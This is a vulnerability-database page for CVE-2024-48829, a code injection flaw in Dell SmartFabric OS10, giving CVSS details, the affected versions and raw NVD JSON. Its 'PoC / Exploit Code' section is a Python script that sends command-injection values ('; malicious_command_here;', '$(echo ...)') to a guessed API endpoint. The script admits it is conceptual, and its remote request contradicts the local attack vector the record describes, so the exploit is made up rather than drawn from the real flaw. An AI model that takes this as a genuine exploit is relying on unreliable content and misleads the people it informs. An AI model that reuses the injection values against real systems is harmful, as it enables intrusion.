Security Vulnerability Report
中文
CVE-2024-48829 CVSS 6.7 MEDIUM

CVE-2024-48829

Published: 2025-11-12 20:15:35
Last Modified: 2025-11-17 12:33:51

Description

Dell SmartFabric OS10 Software, versions prior to 10.6.1.0, contain an Improper Control of Generation of Code ('Code Injection') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Code execution.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dell:smartfabric_os10:*:*:*:*:*:*:*:* - VULNERABLE
Dell SmartFabric OS10 < 10.6.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-48829 PoC - Dell SmartFabric OS10 Code Injection # This is a conceptual PoC for demonstration purposes import requests import json # Target configuration target_ip = "<target_ip>" target_port = 443 # Authentication with high privileged account auth_token = "<admin_token>" # Malicious payload for code injection # The actual vulnerable parameter needs to be identified through testing injection_payload = { "config": "; malicious_command_here;", "command": "system-exec", "params": [ "$(echo vulnerable_command)" ] } # Construct request url = f"https://{target_ip}:{target_port}/api/v1/system/config" headers = { "Authorization": f"Bearer {auth_token}", "Content-Type": "application/json" } # Send exploit request try: response = requests.post(url, headers=headers, json=injection_payload, verify=False, timeout=10) print(f"Response Status: {response.status_code}") print(f"Response Body: {response.text}") except requests.exceptions.RequestException as e: print(f"Request failed: {e}") # Note: This PoC is for authorized testing only. Ensure you have proper authorization before testing.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-48829", "sourceIdentifier": "[email protected]", "published": "2025-11-12T20:15:34.917", "lastModified": "2025-11-17T12:33:50.973", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell SmartFabric OS10 Software, versions prior to 10.6.1.0, contain an Improper Control of Generation of Code ('Code Injection') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Code execution."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:smartfabric_os10:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.6.1.0", "matchCriteriaId": "1F75B21C-7B8B-4EA7-8D09-2AB14584AB52"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000391062/dsa-2025-407-security-update-for-dell-networking-os10-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}